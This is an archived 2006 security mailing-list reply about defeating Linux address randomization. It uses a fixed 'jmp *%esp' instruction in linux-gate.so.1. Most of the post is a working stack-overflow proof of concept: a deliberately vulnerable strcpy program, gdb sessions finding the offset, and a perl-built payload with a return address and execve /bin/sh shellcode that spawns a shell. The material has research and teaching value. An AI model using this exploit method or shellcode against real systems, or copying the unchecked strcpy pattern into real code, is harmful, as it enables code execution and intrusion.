Vulnerability Development mailing list archives

Re: Beating memory address randomization (secuirty) features in Unix/Linux

From: xgc () gotfault net
Date: 29 Mar 2006 20:02:38 -0000

To bypass VA Space Randomization on Linux:

[~/tmp] $ more stack.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv) {
        char buf[256];
        strcpy(buf, argv[1]);
        return 1;
}
[~/tmp] $ gcc -o stack stack.c
[~/tmp] $ ldd stack
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/tls/libc.so.6 (0xb7e32000)
        /lib/ld-linux.so.2 (0xb7f70000)
[~/tmp] $ ldd stack
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/tls/libc.so.6 (0xb7e72000)
        /lib/ld-linux.so.2 (0xb7fb0000)
[~/tmp] $

As you can see linux-gate.so.1 is linked on stack program and its address isn't randomized.

In this range address there is a lot of instructions mainly JMP *%ESP which can be used to points to stack and execute 
arbitraty code.

[~/tmp] $ gdb ./stack -q
Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x80483a1
(gdb) run
Starting program: /home/xgc/tmp/stack

Breakpoint 1, 0x080483a1 in main ()
(gdb) x/i 0xffffe75f
0xffffe75f:     jmp    *%esp
(gdb)

A Proof Of Concept will be showed below:

[~/tmp] $ !gdb
gdb ./stack -q
Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) x/i main+3
0x804839b <main+3>:     sub    $0x108,%esp
(gdb) printf "%d\n", 0x108
264
(gdb) run `perl -e 'print "A"x260,"BBBB"'`
Starting program: /home/xgc/tmp/stack `perl -e 'print "A"x260,"BBBB"'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/i 0xffffe75f
0xffffe75f:     jmp    *%esp
(gdb) run `perl -e 'print 
"A"x260,"\x5f\xe7\xff\xff","\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/xgc/tmp/stack `perl -e 'print 
"A"x260,"\x5f\xe7\xff\xff","\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
sh-3.1$ uname -na
Linux localhost 2.6.12.5-vs2.0 #1 SMP Tue Aug 23 16:21:23 CEST 2005 i686 GNU/Linux
sh-3.1$

At EIP we set the address which jumps to ESP. It then will looks to next instructions, where exists shellcode.

"Does anyone know if there are any articles related to this on the web?"

Yes there is a paper from izik on: http://www.tty64.org/doc/smackthestack.txt

- dx

Current thread:

Beating memory address randomization (secuirty) features in Unix/Linux hd12787 (Mar 28)
- Re: Beating memory address randomization (secuirty) features in Unix/Linux Yves Younan (Mar 31)
- <Possible follow-ups>
- Re: Beating memory address randomization (secuirty) features in Unix/Linux xgc (Mar 31)
  - Re: Beating memory address randomization (secuirty) features in Unix/Linux Don Bailey (Mar 31)
- Re: Beating memory address randomization (secuirty) features in Unix/Linux john (Mar 31)
- Re: Beating memory address randomization (secuirty) features in Unix/Linux Don Bailey (Mar 31)